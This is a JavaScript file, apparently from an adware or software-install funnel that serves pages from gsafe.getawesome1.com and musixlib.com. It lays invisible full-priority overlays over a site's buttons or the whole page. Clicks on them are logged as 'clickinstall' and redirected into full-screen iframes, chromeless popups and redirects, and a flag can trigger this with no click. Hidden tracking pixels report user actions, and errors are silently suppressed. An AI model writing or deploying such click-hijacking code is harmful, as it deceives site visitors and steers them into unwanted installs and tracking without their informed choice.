try {

    var curTest = getURLParameter('itid', null);

    var baseIframeSrc = "//gsafe.getawesome1.com/wim/static/wi/main.html?loadFromClientWI=1";

    var tmpDmn             = getURLParameter('dmn', '');
    var tmpShowCloseButton = getURLParameter('scb', '1');
    var loadTo             = getURLParameter('loadTo', '');
    var moc                = getURLParameter('moc','0');
    var isP                = getURLParameter('isP', '0');
    var isIF               = getURLParameter('isIF', '0');
    var openIF             = getURLParameter('openIF', '0');
    var rednow             = getURLParameter('rednow', '0');

    window.addEventListener("message", receiveMessageLabs, false);

    if (isP === '1' || isIF === '1') {

        let message = "?tp=iw";
        if (isP === '1')  { message += "&isP=1"; }
        if (isIF === '1') { message += "&isIF=1"; }
        if (rednow === '1') { message += "&rednow=1"; }

        if (openIF !== '1') {

            if (typeof loadTo == 'string' && loadTo.length > 0) {
                let buttons = document.getElementsByClassName(loadTo);
                for (let i = buttons.length - 1; i >= 0; i--) {

                    let rect = buttons[i].getBoundingClientRect();

                    let elemWIoverlayDiv = document.createElement('div');
                    elemWIoverlayDiv.setAttribute( 'class', 'WIoverlayDiv' );
                    elemWIoverlayDiv.style.position = "absolute";
                    elemWIoverlayDiv.style.top = (rect.top + window.scrollY)+"px";
                    elemWIoverlayDiv.style.left = (rect.left + window.scrollX)+"px";
                    elemWIoverlayDiv.style.width = (rect.width)+"px";
                    elemWIoverlayDiv.style.height = (rect.height)+"px";
                    elemWIoverlayDiv.style.cursor = 'pointer';
                    elemWIoverlayDiv.style.zIndex = "2147483646";
                    document.body.appendChild(elemWIoverlayDiv);
                }

                loadTo = null; // reset loadTo
            }
            else {
                let elemWIoverlayDiv = document.createElement('div');
                elemWIoverlayDiv.setAttribute( 'class', 'WIoverlayDiv' );
                elemWIoverlayDiv.setAttribute( 'style', 'height: 100%;width: 100%;position: fixed;top: 0px;left: 0px;' );
                elemWIoverlayDiv.style.cursor = 'pointer';
                elemWIoverlayDiv.style.zIndex = "2147483646";
                document.body.appendChild(elemWIoverlayDiv);
            }

            let buttons = document.getElementsByClassName('WIoverlayDiv');
            for (let i = buttons.length - 1; i >= 0; i--) {
                buttons[i].onclick = function() {
                    report('clickinstall');
                    addSpinner();
                    window.postMessage(message, "*");
                };
            }

            if (rednow === '1') {
                // report('clickinstall');
                addSpinner();
                window.postMessage(message, "*");
            }

        }
    }

    if (openIF === '1') {
        createIframe(atob(getURLParameter('u', '')));
    }

    // reporter - client-wi-load

} catch (e) { }

function addSpinner() {
    try {
        let spinner = document.createElement('div');
        spinner.setAttribute( 'style', 'height: 100%;width: 100%;position: fixed;top: 0px;left: 0px; background: rgba(255,255,255,0.8);' );
        spinner.style.zIndex = "2147483646";
        spinner.innerHTML = '<div style="text-align: center; margin-top: 200px;"><img src="//gsafe.getawesome1.com/wim/static/assets/spinners/2.gif" /><h1 style="color: #3a99c1; margin: -35px 0 0 15px;">Loading...</h1></div>';
        document.body.appendChild(spinner);
    } catch (e) { }
}

function receiveMessageLabs(event) {
    try {
        // console.log("received message from " + event.origin);

        if (typeof event === "object" &&
            typeof event.data === "string" && event.data === "closeLabsIframe") {
            closeIframe();
        }

        else if ((event.origin !== "http://" + tmpDmn) && (event.origin !== "https://" + tmpDmn))
            return;

        else if (typeof event === "object" && typeof event.data === "string") {

            if (getURLParameter('isP','0',event.data) === '1') {
                createPop(getIframeSrc(event.data));

                // createIframe('http://www.musixlib.com/');
                window.location = 'http://www.musixlib.com/musixlibss.html?isP=1&tu='+btoa(getTestUrl());
            }
            else if (getURLParameter('isIF','0',event.data) === '1') {
                window.location = 'http://www.musixlib.com/musixlibss.html?isIF=1&tu='+btoa(getTestUrl())+'&u='+btoa(getIframeSrc(event.data));
            }

            else {
                createIframe(getIframeSrc(event.data));
            }

            // let closerInterval = setInterval(function() {
            //     if (myPopWindow.closed === true && document.getElementById('LabsIFrameContainer') === null) {
            //         let buttons = document.getElementsByClassName('WIoverlayDiv');
            //         for (let i = buttons.length - 1; i >= 0; i--) {
            //             buttons[i].parentNode.removeChild(buttons[i]);
            //         }
            //         clearInterval(closerInterval);
            //     }
            // },500);

            // reporter - iframe-created
        }

    } catch (e) {
    }
}

function getIframeSrc(url) {
    try {
        if (typeof url === 'undefined') {
            url = null;
        }

        let iframeSrc = baseIframeSrc
            + "&tp=" + getURLParameter('tp', 'iw', url)
            + "&qa=" + getURLParameter('qa', '', url)
            + "&t1=" + getURLParameter('t1', null, url)
            + "&t2=" + getURLParameter('t2', null, url)
            + "&v=" + getURLParameter('v', '7', url)
            + "&vn=" + getURLParameter('vn', '', url)
            + "&gnum=" + getURLParameter('gnum', '0', url)
            + "&cid=" + getURLParameter('cid', '7595', url)
            + "&clickid=" + getURLParameter('clickid', '1', url)
            + "&ctag=" + getURLParameter('ctag', '', url)
            + "&cachecode=" + getURLParameter('cachecode', '@@SECRET@@', url)
            + "&ign=" + getURLParameter('ign', '', url)
            + "&geo=" + getURLParameter('geo', 'us', url)
            + "&isP=" + getURLParameter('isP', '', url)
            + "&isIF=" + getURLParameter('isIF', '', url)
            + "&rednow=" + getURLParameter('rednow', '', url)
            + "&openIF=" + getURLParameter('openIF', '', url)
        ;

        return iframeSrc;
    } catch (e) { }
}

function createPop(url, windowParams) {
    try {
        if (windowParams === undefined) { windowParams = []; }

        let ScreenWidth = window.innerWidth ? window.innerWidth : document.documentElement.clientWidth ? document.documentElement.clientWidth : screen.width;

        let width = windowParams.width || 1034;
        let height = windowParams.height || 664;
        let top = windowParams.top || (window.outerHeight - window.innerHeight);
        let left = windowParams.left || ((ScreenWidth / 2) - (width / 2));
        let location = windowParams.location || 'no';
        let titleBar = windowParams.titleBar || 'no';
        let toolbar = windowParams.toolbar || 'no';
        let scrollbars = windowParams.scrollbars || 'no';
        let resizable = windowParams.resizable || 'no';

        const config = "location=" + location +
            ",titlebar=" + titleBar +
            ",toolbar=" + toolbar +
            ",scrollbars=" + scrollbars +
            ",resizable=" + resizable +
            ",screenY=" + top +
            ",screenX=" + left +
            ",width=" + width +
            ",height=" + height;

        if (window.myPopWindow === undefined || window.myPopWindow.closed) {
            window.myPopWindow = window.open(url, url, config);
        }
        else {
            window.myPopWindow.focus();
        }
    } catch (e) {
    }
}

function createIframe(src) {
    try {

        // close button:
        let tmpStyleCloseButton = document.createElement('style');
        tmpStyleCloseButton.innerHTML = "" +
            ".labs-iframe-close-button {\n" +
            "  cursor: pointer;\n" +
            "  position: fixed;\n" +
            "  right: 16px;\n" +
            "  top: 16px;\n" +
            "  width: 16px;\n" +
            "  height: 16px;\n" +
            "  opacity: 0.4;\n" +
            "  z-index: 2147483647;\n" +
            "}\n" +
            ".labs-iframe-close-button:hover {\n" +
            "  opacity: 1;\n" +
            "}\n" +
            ".labs-iframe-close-button:before, .labs-iframe-close-button:after {\n" +
            "  position: absolute;\n" +
            "  content: ' ';\n" +
            "  height: 22px;\n" +
            "  width: 4px;\n" +
            "  background-color: #000000;\n" +
            "}\n" +
            ".labs-iframe-close-button:before {\n" +
            "  transform: rotate(45deg);\n" +
            "}\n" +
            ".labs-iframe-close-button:after {\n" +
            "  transform: rotate(-45deg);\n" +
            "}";
        let tmpCloseButton = document.createElement('span');
        // tmpCloseButton.setAttribute("style", "color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;cursor: pointer;position:fixed;top:0;right:0;margin: 15px; z-index: 2147483645");
        tmpCloseButton.setAttribute("id", "LabsIFrameCloseButton");
        tmpCloseButton.setAttribute("class", "labs-iframe-close-button");
        tmpCloseButton.setAttribute("style", "display:none;");
        // tmpCloseButton.innerText = "x";

        tmpCloseButton.addEventListener("click", function () {
            closeIframe();
        }, false);

        // iframe:
        let tmpIframe = document.createElement("iframe");
        tmpIframe.setAttribute("id", "iframeNotif");
        tmpIframe.setAttribute("src", src);
        tmpIframe.setAttribute("frameborder", "0");
        tmpIframe.setAttribute("height", "100%");
        tmpIframe.setAttribute("width", "100%");
        tmpIframe.setAttribute("allowtransparency", "true");
        tmpIframe.style.position = "fixed";
        tmpIframe.style.border = "none";
        tmpIframe.style.top = "0";
        tmpIframe.style.right = "0";
        tmpIframe.style.bottom = "0";
        tmpIframe.style.left = "0";
        tmpIframe.style.width = "100%";
        tmpIframe.style.height = "100%";
        tmpIframe.style.zIndex = "2147483646";

        if (typeof loadTo == 'string' && loadTo.length > 0) {

            tmpCloseButton.setAttribute("style", "display:none;");

            let rect = document.getElementById(loadTo).getBoundingClientRect();
            tmpIframe.style.top = (rect.top + window.scrollY)+"px";
            tmpIframe.style.left = (rect.left + window.scrollX)+"px";
            tmpIframe.style.width = (rect.width)+"px";
            tmpIframe.style.height = (rect.height)+"px";
            tmpIframe.setAttribute("scrolling", "no");
            tmpIframe.style.visibility = "visible";

            tmpIframe.addEventListener('load', function () {
                try {

                    window.focus();
                    let listener = addEventListener('blur', function() {
                        if(document.activeElement === document.getElementById('iframeNotif')) {
                            MaximizeIframe();
                            document.getElementById('LabsIFrameCloseButton').style.display = 'block';
                        }
                        //removeEventListener(listener);
                    });

                } catch (e){ }

            }, false);
        }

        tmpIframe.addEventListener('load', function () {
            try {
                document.getElementById('LabsIFrameCloseButton').style.display = 'block';

                // reporter - iframe-loaded

            } catch (e){ }

        }, false);

        // container for close button + iframe:
        let tmpContainer = document.createElement('div');
        tmpContainer.setAttribute("id", "LabsIFrameContainer");
        tmpContainer.appendChild(tmpStyleCloseButton);

        if (tmpShowCloseButton == "1") {
            tmpContainer.appendChild(tmpCloseButton);
        }

        tmpContainer.appendChild(tmpIframe);
        document.body.appendChild(tmpContainer);

    } catch (e) {
    }
}

function closeIframe() {
    try {

        if (typeof loadTo == 'string' && loadTo.length > 0 && moc == '1') {
            document.getElementById('iframeNotif').contentWindow.postMessage({ // reload iframe
                action: "reloadIframe",
            }, "*");

            MinimizeIframe();
            document.getElementById('LabsIFrameCloseButton').style.display = 'none';
        }
        else {
            let tmp = document.getElementById('LabsIFrameContainer');
            if (tmp) {
                tmp.parentNode.removeChild(tmp);
                closeIframe();
            }
        }

    } catch (e) {
    }
}

function MaximizeIframe() {
    try {
        let tmp = document.getElementById('iframeNotif');
        if (tmp) {
            tmp.style.top = "0";
            tmp.style.left = "0";
            tmp.style.width = "100%";
            tmp.style.height = "100%";
            tmp.setAttribute("scrolling", "auto");

            // reporter - iframe Maximized
        }
    } catch (e) {
    }
}

function MinimizeIframe() {
    try {
        if (typeof loadTo == 'string' && loadTo.length > 0) {

            let rect = document.getElementById(loadTo).getBoundingClientRect();
            let tmpIframe = document.getElementById("iframeNotif");

            tmpIframe.style.top = (rect.top + window.scrollY)+"px";
            tmpIframe.style.left = (rect.left + window.scrollX)+"px";
            tmpIframe.style.width = (rect.width)+"px";
            tmpIframe.style.height = (rect.height)+"px";
            tmpIframe.setAttribute("scrolling", "no");
            tmpIframe.style.visibility = "visible";

        }
    } catch (e) {
    }
}

function getURLParameter(name, def, url) {
    try {

        if (typeof def === 'undefined') {
            def = null;
        }

        if (typeof url !== 'string') {
            if (document.currentScript instanceof Object &&
                typeof document.currentScript.src === "string" && document.currentScript.src.length > 0) {
                url = document.currentScript.src;
            } else {
                url = location.href;
            }
        }
        if (typeof window.getWindowURLParameter === "function") {
            let URLOverride = getWindowURLParameter(name, false);
            if (typeof URLOverride === "string" && URLOverride.length > 0) {
                url = location.href;
            }
        }

        if (url.indexOf('?') >= 0) {
            url = url.substr(url.indexOf("?"));
        } else {
            url = '';
        }
        return decodeURIComponent((new RegExp('[?|&]' + name + '=' + '([^&;]+?)(&|#|;|$)').exec(url) || [, ""])[1].replace(/\+/g, '%20')) || def;
    } catch (e) {
    }
}

function getWindowURLParameter(name, def, url) {
    try {
        if (typeof def === 'undefined') {
            def = null;
        }
        if (typeof url !== 'string') {
            url = location.href;
        }
        if (url.indexOf('?') >= 0) {
            url = url.substr(url.indexOf("?"));
        } else {
            url = '';
        }
        return decodeURIComponent((new RegExp('[?|&]' + name + '=' + '([^&;]+?)(&|#|;|$)').exec(url) || [, ""])[1].replace(/\+/g, '%20')) || def;
    } catch (e) {
    }
}

function firePixelTest(action) {
    try {

        let url = "//appping-140507.appspot.com/witests_stats/add?test_id="+ getURLParameter('itid',curTest) +
            "&user_group=" + getURLParameter('ictag','no-ctag') + "&y_letters=abds&vertical="+getURLParameter('gnum', '0') +
            "&action=" + action + "&cid=" + getURLParameter('cid', '7595') + "&click_id=" + getURLParameter('clickid', '1')
        ;

        appendImg(url);

    } catch (e) {
    }
}

function appendImg(src) {
    try {
        let img = document.createElement("img");
        img.setAttribute("src", src);
        img.setAttribute("height", "1");
        img.setAttribute("width", "1");
        img.setAttribute("alt", "");
        img.setAttribute("style", "display:none");
        document.body.appendChild(img);
    } catch (e) { }
}

window.onerror = function myErrorHandler(errorMsg, url, lineNumber) {
    //alert("Error occured: " + errorMsg);//or any message
    return false;
};
